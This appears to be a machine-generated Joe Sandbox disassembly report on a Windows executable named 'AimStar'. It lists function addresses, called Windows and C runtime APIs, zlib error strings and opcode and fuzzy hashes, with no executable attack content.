Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID:
String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
API String ID: 0-2665694366
Opcode ID: 183baba8c618070380c74d0f680cff30a06716a401d1faaba0935d79222a4dc0
Instruction ID: df98eab0265f726f477f4bf18308fc7b45a8e16de63dd7711bc96691db3e1bbd
Opcode Fuzzy Hash: 183baba8c618070380c74d0f680cff30a06716a401d1faaba0935d79222a4dc0
Instruction Fuzzy Hash: 4A52F772A18AA987D7949F24C459F7E7BADFB84350F414139EA4A877C0DB3CE848CB50

Function 00007FF710F4D19C Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF710F4D1B8
RtlCaptureContext.KERNEL32 ref: 00007FF710F4D1E5
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF710F4D1FF
RtlVirtualUnwind.KERNEL32 ref: 00007FF710F4D240
IsDebuggerPresent.KERNEL32 ref: 00007FF710F4D294
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF710F4D2B1
UnhandledExceptionFilter.KERNEL32 ref: 00007FF710F4D2BC

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
Instruction ID: d16efa32864ed7a321df98741386e48a9af5a9e4d417308362dc1b0aaf0c4c62
Opcode Fuzzy Hash: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
Instruction Fuzzy Hash: B3313076608E8586EB60AF60E8517EE73A4FB84758F44403ADA4D47B94EF38D548C720

Function 00007FF710F65C70 Relevance: 9.3, APIs: 6, Instructions: 334timeCOMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF710F65CB5

Part of subcall function 00007FF710F65608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF710F6561C

Part of subcall function 00007FF710F5A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF710F62D92,?,?,?,00007FF710F62DCF,?,?,00000000,00007FF710F63295,?,?,?,00007FF710F631C7), ref: 00007FF710F5A9CE
Part of subcall function 00007FF710F5A9B8: GetLastError.KERNEL32(?,?,?,00007FF710F62D92,?,?,?,00007FF710F62DCF,?,?,00000000,00007FF710F63295,?,?,?,00007FF710F631C7), ref: 00007FF710F5A9D8

Part of subcall function 00007FF710F5A970: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF710F5A94F,?,?,?,?,?,00007FF710F5A83A), ref: 00007FF710F5A979
Part of subcall function 00007FF710F5A970: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF710F5A94F,?,?,?,?,?,00007FF710F5A83A), ref: 00007FF710F5A99E

_get_daylight.LIBCMT ref: 00007FF710F65CA4

Part of subcall function 00007FF710F65668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF710F6567C

_get_daylight.LIBCMT ref: 00007FF710F65F1A
_get_daylight.LIBCMT ref: 00007FF710F65F2B
_get_daylight.LIBCMT ref: 00007FF710F65F3C
GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF710F6617C), ref: 00007FF710F65F63

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
String ID:
API String ID: 4070488512-0
Opcode ID: 76424cc0ec02945f4fd2ccc640ea60475aa997d4131cc6c9dd67359800dfdabb
Instruction ID: 49e6d8236ff3031130ea1b969ef1b6e06bcf4b4d248ff8fe0acab26016519b7a
Opcode Fuzzy Hash: 76424cc0ec02945f4fd2ccc640ea60475aa997d4131cc6c9dd67359800dfdabb
Instruction Fuzzy Hash: F7D1E22AA0CA0245EB20FF21D4461B9B769EF94BA4FC48136EA0D57796DF3CF449C760

Function 00007FF710F5A684 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF710F5A6FD
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF710F5A715
RtlVirtualUnwind.KERNEL32 ref: 00007FF710F5A750
IsDebuggerPresent.KERNEL32 ref: 00007FF710F5A789
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF710F5A793
UnhandledExceptionFilter.KERNEL32 ref: 00007FF710F5A79E

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
Instruction ID: a269d102a8c2c3bed4aff0a0944e554530cbf553c41f8533f9e97c13446cabfc
Opcode Fuzzy Hash: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
Instruction Fuzzy Hash: 3031943661CF8586D760DF25E8412AEB3A8FB88768F940135EA8D43B55EF3CE159CB10

Function 00007FF710F618E4 Relevance: 7.8, APIs: 5, Instructions: 282COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF710F61930
FindFirstFileExW.KERNEL32 ref: 00007FF710F61A3A

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: FileFindFirst_invalid_parameter_noinfo
String ID:
API String ID: 2227656907-0
Opcode ID: 5fde642f47360a120b3bbdc49a752417dcdc94f7dd720a243365bab1f94d45be
Instruction ID: 2790e1605a25fa21914b2ccafce8629b9dd7c71b1face50b81754119035eabb1
Opcode Fuzzy Hash: 5fde642f47360a120b3bbdc49a752417dcdc94f7dd720a243365bab1f94d45be
Instruction Fuzzy Hash: 6FB1D72AB1CE9641EA60AB6194121BDE3A8FB85BF4F884131DE5D47BC5EE3CF449C310

Function 00007FF710F65EEC Relevance: 6.1, APIs: 4, Instructions: 143timeCOMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF710F65F1A

Part of subcall function 00007FF710F65668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF710F6567C

_get_daylight.LIBCMT ref: 00007FF710F65F2B

Part of subcall function 00007FF710F65608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF710F6561C

_get_daylight.LIBCMT ref: 00007FF710F65F3C

Part of subcall function 00007FF710F65638: _invalid_parameter_noinfo.LIBCMT ref: 00007FF710F6564C

Part of subcall function 00007FF710F5A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF710F62D92,?,?,?,00007FF710F62DCF,?,?,00000000,00007FF710F63295,?,?,?,00007FF710F631C7), ref: 00007FF710F5A9CE
Part of subcall function 00007FF710F5A9B8: GetLastError.KERNEL32(?,?,?,00007FF710F62D92,?,?,?,00007FF710F62DCF,?,?,00000000,00007FF710F63295,?,?,?,00007FF710F631C7), ref: 00007FF710F5A9D8

GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF710F6617C), ref: 00007FF710F65F63

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 3458911817-0
Opcode ID: 8084827ab6892e9bf44fc7ae7df730cc4e836e683a41a1d7f4ca7a201d78ec16
Instruction ID: 72e60c5750dc642b1ba22b15bc68d6b8610a89e6cc0c9bc41c7db94711dd431d
Opcode Fuzzy Hash: 8084827ab6892e9bf44fc7ae7df730cc4e836e683a41a1d7f4ca7a201d78ec16
Instruction Fuzzy Hash: 90514026A0CA4286E710FF21D5875A9B768FB487A4FC48136EA4D537A6DF3CF448C760

Function 00007FF710F4D080 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF710F4D0AC
GetCurrentThreadId.KERNEL32 ref: 00007FF710F4D0BA
GetCurrentProcessId.KERNEL32 ref: 00007FF710F4D0C6
QueryPerformanceCounter.KERNEL32 ref: 00007FF710F4D0D6

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
Instruction ID: f0317e65e8596aa9e8f84eb3ef76c3de50361feac90b3b1882d1941425c9f424
Opcode Fuzzy Hash: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
Instruction Fuzzy Hash: 6F112136B18F0589EB00DF60E8552B973A8F759768F440E31EA5D467A4DF7CE198C350

Function 00007FF710F63C80 Relevance: 4.8, APIs: 3, Instructions: 340COMMON

Download Yara Rule

APIs

memcpy_s.LIBCPMT ref: 00007FF710F63CE6
memcpy_s.LIBCPMT ref: 00007FF710F63D11

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: memcpy_s
String ID:
API String ID: 1502251526-0
Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
Instruction ID: dc67f206cc05402b724b27615cdbc75b1a879a8bd2d9153149adcb1e9895a8bf
Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
Instruction Fuzzy Hash: 34C1F276B1CA8A87EB249F19A04566AF7A5F794B94F808134DB4E43784DF3DF808CB00

Function 00007FF710F4A4E4 Relevance: 4.1, Strings: 3, Instructions: 398COMMON

Download Yara Rule

Strings

, xrefs: 00007FF710F4A5CB
unknown header flags set, xrefs: 00007FF710F4A535
header crc mismatch, xrefs: 00007FF710F4A991

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID:
String ID: $header crc mismatch$unknown header flags set
API String ID: 0-1127688429
Opcode ID: 41de47797cb66f1826093f4b1d60416fd99d26d25a53ce6bfd127eaa39bdfb5e
Instruction ID: 6676d5f4a399ba833241891af1c0d7d64021a88fbd01c7d5b881b97d92cf5030
Opcode Fuzzy Hash: 41de47797cb66f1826093f4b1d60416fd99d26d25a53ce6bfd127eaa39bdfb5e
Instruction Fuzzy Hash: 32F19472A0CBD58BE7A5AF188089F3ABAADEF44750F464538DE4987390CB38F548C750

Function 00007FF710F69798 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE

Download Yara Rule

APIs

_clrfp.LIBCMT ref: 00007FF710F699E7
RaiseException.KERNEL32 ref: 00007FF710F699F8

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: ExceptionRaise_clrfp
String ID:
API String ID: 15204871-0
Opcode ID: 2f74b2cda317b12825bead48c90720a79ba1abfeed249303701d480a1679e454
Instruction ID: e12851ec7c1d1530f72f4233b6f16a0becba783f46b177c27c08e7a32ddfaa11
Opcode Fuzzy Hash: 2f74b2cda317b12825bead48c90720a79ba1abfeed249303701d480a1679e454
Instruction Fuzzy Hash: 14B1B07BA08B898BEB15CF29C4423AC77E8F740B58F548825DB5D837A4CB39E455C710

Function 00007FF710F53A14 Relevance: 2.8, Strings: 2, Instructions: 350COMMON

Download Yara Rule

Strings

, xrefs: 00007FF710F53B82
, xrefs: 00007FF710F53DC4

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-227171996
Opcode ID: 3098a868bf4d382f942c0283459ab4806c0f53f7eb332f8174ba39f6fc7772a0
Instruction ID: 8c39777023823ca9419816b1081d39cc827309a0b2ff6e02b84bcddc4a7927b3
Opcode Fuzzy Hash: 3098a868bf4d382f942c0283459ab4806c0f53f7eb332f8174ba39f6fc7772a0
Instruction Fuzzy Hash: DDE1E736A0CE4682DB68AE1D805613DB3B8FF45B68F948135DA4E07794DF29FA49C710

Function 00007FF710F4A34B Relevance: 2.7, Strings: 2, Instructions: 216COMMON

Download Yara Rule

Strings

incorrect header check, xrefs: 00007FF710F4A4CB
invalid window size, xrefs: 00007FF710F4A4B2

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID:
String ID: incorrect header check$invalid window size
API String ID: 0-900081337
Opcode ID: 5aba513b73eb8988df982bd12c0510577381bb82701c7147ce4cedc0b53fa8f7
Instruction ID: 7613b70169dde800c8bb510787b97f2c6bf2270e0e06bdaa157820a2a1630d05
Opcode Fuzzy Hash: 5aba513b73eb8988df982bd12c0510577381bb82701c7147ce4cedc0b53fa8f7
Instruction Fuzzy Hash: A9919472A1CACA87E7A49E14C489F3E7AADFB44360F514139DE4A86791DB3CF548CB10

Function 00007FF710F5DF60 Relevance: 2.6, Strings: 2, Instructions: 144COMMON

Download Yara Rule

Strings

gfff, xrefs: 00007FF710F5E0EA
e+000, xrefs: 00007FF710F5E06D

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID:
String ID: e+000$gfff
API String ID: 0-3030954782
Opcode ID: b62be3d0480bbbd0e022829aa0980c84d51f153df7fa61e27e52cad2b39beef0
Instruction ID: 00f8a87351ef7499b621cbb3f7d5662dd1ba9ebe2961d10cc479cb15a9d36027
Opcode Fuzzy Hash: b62be3d0480bbbd0e022829aa0980c84d51f153df7fa61e27e52cad2b39beef0
Instruction Fuzzy Hash: 8F515B62B1CAC186E7289E359802769EBA5E744BA4F88C231CB9C47BC5CF7DF149C710

Function 00007FF710F60938 Relevance: 2.0, APIs: 1, Instructions: 461COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: CurrentFeaturePresentProcessProcessor
String ID:
API String ID: 1010374628-0
Opcode ID: 2d471da97334de2acf0262392bad6ca7d41a72817533bf8b70dbf69db73f0db4
Instruction ID: 1538f4de2676d7316bac5f75922eab386327a1096978365edd2bbec27ad725c1
Opcode Fuzzy Hash: 2d471da97334de2acf0262392bad6ca7d41a72817533bf8b70dbf69db73f0db4
Instruction Fuzzy Hash: 7902C129A1DF5640FA65BB1194032BAE6BCAF45BB0FE58635ED5D463D2DE3CB408C320

Function 00007FF710F5DACC Relevance: 1.5, Strings: 1, Instructions: 254COMMON

Download Yara Rule

Strings

gfffffff, xrefs: 00007FF710F5DE0E

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID:
String ID: gfffffff
API String ID: 0-1523873471
Opcode ID: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
Instruction ID: c05d7be0b46c234ca51cb88911395d1d2b7afdc46cfae159b93ce2140f2ed2c9
Opcode Fuzzy Hash: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
Instruction Fuzzy Hash: 79A16763A0DBC646EB31EF25A0017A9BBA9EB607A4F458031DE4D477C1DE3DE60AC311

Function 00007FF710F58804 Relevance: 1.4, Strings: 1, Instructions: 177COMMON

Download Yara Rule

Strings

TMP, xrefs: 00007FF710F58823

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: TMP
API String ID: 3215553584-3125297090
Opcode ID: 5f14576829c2a404d65bc8e6713cc3c63392e5e443677cfdf71167dbae88db0a
Instruction ID: 92febcf82ac9465cdfc2e7fff7d445a3342fc1a53c60c73026cb998f90a1ac37
Opcode Fuzzy Hash: 5f14576829c2a404d65bc8e6713cc3c63392e5e443677cfdf71167dbae88db0a
Instruction Fuzzy Hash: DD519415B0CB4641FA64BA26590317AE2A8AF85BE4FC84035DD0E57796EE3CF61EC221

Function 00007FF710F634F0 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FF710F634F4

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 39e33fd4700d97162abc6aa121af668d241eeaeaed41ff08026f27548e358ff0
Instruction ID: 3565c238030b60d11c37d704d9956a40c85341e6c94e63730fdb79a175d75d6e
Opcode Fuzzy Hash: 39e33fd4700d97162abc6aa121af668d241eeaeaed41ff08026f27548e358ff0
Instruction Fuzzy Hash: 34B09224E0BE06C2EA093B21AC8321862A8BF48720FD84139C00C50330DE2C30E99720

Function 00007FF710F53610 Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f2a1199bc68cddcf3b08423a19983f3afdde0c7e054ddf4c3f66946da216a90
Instruction ID: 417afec7d3ae7e80bfd53e9b3f6f12891e6d82a669d3244cd025f598789c4838
